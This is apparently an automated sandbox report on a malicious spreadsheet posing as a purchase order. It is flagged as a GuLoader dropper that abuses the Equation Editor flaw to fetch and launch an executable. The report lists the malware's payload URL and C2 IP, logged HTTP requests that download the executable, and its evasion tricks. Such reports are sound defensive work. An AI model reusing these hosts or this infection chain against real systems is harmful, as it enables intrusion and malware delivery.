Windows Analysis Report new order requirment-21 July.xlsx

Overview

General Information

Sample Name: new order requirment-21 July.xlsx
Analysis ID: 451759
MD5: 25f7735ff71a70abf4bb508d2711f50b
SHA1: 7f40fff223019a3e399ca0ae0990afaf2695e93b
SHA256: 821f2880a8218afc0d30711b46f7d28e9adb2cd6c3db88b881de91090e72337f
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_lOulvHP91.bip"}
Multi AV Scanner detection for domain / URL
Source: http://180.214.239.39/service/.svchost.exe Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Virustotal: Detection: 14%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 14%
Multi AV Scanner detection for submitted file
Source: new order requirment-21 July.xlsx Virustotal: Detection: 30%
Source: new order requirment-21 July.xlsx ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_lOulvHP91.bip
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Wed, 21 Jul 2021 06:30:40 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Tue, 20 Jul 2021 21:04:05 GMT
ETag: "3c468-5c79464e23873"
Accept-Ranges: bytes
Content-Length: 246888
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c e1 51 55 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 62 71 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 03 00 28 00 00 00 00 50 03 00 b4 54 00 00 00 00 00 00 00 00 00 00 50 b0 03 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 180.214.239.39
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP VN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /service/.svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 180.214.239.39
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39 (50 identical events)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf
Source: global traffic HTTP traffic detected:
GET /service/.svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 180.214.239.39
Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: DE6E00F3.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FF NtAllocateVirtualMemory, 6_2_002F53FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F5541 NtAllocateVirtualMemory, 6_2_002F5541
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FB NtAllocateVirtualMemory, 6_2_002F53FB
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FF 6_2_002F53FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 6_2_002F2407
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F207C 6_2_002F207C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F444B 6_2_002F444B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F5844 6_2_002F5844
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7CB7 6_2_002F7CB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F38B4 6_2_002F38B4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8C81 6_2_002F8C81
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F40EF 6_2_002F40EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F04C0 6_2_002F04C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F58D6 6_2_002F58D6
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F293F 6_2_002F293F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2567 6_2_002F2567
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6D5C 6_2_002F6D5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F51A4 6_2_002F51A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F01E9 6_2_002F01E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F21DB 6_2_002F21DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F01DA 6_2_002F01DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F05D8 6_2_002F05D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7229 6_2_002F7229
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F0626 6_2_002F0626
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1207 6_2_002F1207
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8605 6_2_002F8605
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F824D 6_2_002F824D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2A43 6_2_002F2A43
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7EB4 6_2_002F7EB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3EB2 6_2_002F3EB2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7AEF 6_2_002F7AEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06E2 6_2_002F06E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7AF5 6_2_002F7AF5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F26CA 6_2_002F26CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3EC0 6_2_002F3EC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06D2 6_2_002F06D2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1B2E 6_2_002F1B2E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1B24 6_2_002F1B24
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1706 6_2_002F1706
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6F73 6_2_002F6F73
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F4345 6_2_002F4345
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8B5E 6_2_002F8B5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8B51 6_2_002F8B51
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FA8 6_2_002F3FA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F37A5 6_2_002F37A5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FE9 6_2_002F3FE9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3BE2 6_2_002F3BE2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F47FF 6_2_002F47FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FB 6_2_002F53FB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FC2 6_2_002F3FC2
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: new order requirment-21 July.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$new order requirment-21 July.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD6DE.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 identical events)
Source: new order requirment-21 July.xlsx Virustotal: Detection: 30%
Source: new order requirment-21 July.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: new order requirment-21 July.xlsx Static file information: File size 1242112 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr
Source: new order requirment-21 July.xlsx Initial sample: OLE indicators vbamacros = False
Source: new order requirment-21 July.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002212F5 push edx; ret 6_2_00221321
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220878 push edx; ret 6_2_002208A1

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (9 identical events)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 identical events)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (5 identical events)
Source: new order requirment-21 July.xlsx Stream path 'EncryptedPackage' entropy: 7.99879866952 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 6_2_002F2407
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F207C 6_2_002F207C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7CB7 6_2_002F7CB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F40EF 6_2_002F40EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F04C0 6_2_002F04C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F293F 6_2_002F293F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2567 6_2_002F2567
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6D5C 6_2_002F6D5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F21DB 6_2_002F21DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F05D8 6_2_002F05D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F0626 6_2_002F0626
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8605 6_2_002F8605
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7EB4 6_2_002F7EB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3EB2 6_2_002F3EB2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06E2 6_2_002F06E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06D2 6_2_002F06D2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F4345 6_2_002F4345
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8B51 6_2_002F8B51
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FA8 6_2_002F3FA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F37A5 6_2_002F37A5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FE9 6_2_002F3FE9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FC2 6_2_002F3FC2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 rdtsc 6_2_002F2407
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952 Thread sleep time: -180000s >= -30000s

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 rdtsc 6_2_002F2407
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F5022 mov eax, dword ptr fs:[00000030h] 6_2_002F5022
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F70BE mov eax, dword ptr fs:[00000030h] 6_2_002F70BE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7CB7 mov eax, dword ptr fs:[00000030h] 6_2_002F7CB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F293F mov eax, dword ptr fs:[00000030h] 6_2_002F293F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3147 mov eax, dword ptr fs:[00000030h] 6_2_002F3147
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6B34 mov eax, dword ptr fs:[00000030h] 6_2_002F6B34

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F69D7 cpuid 6_2_002F69D7
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid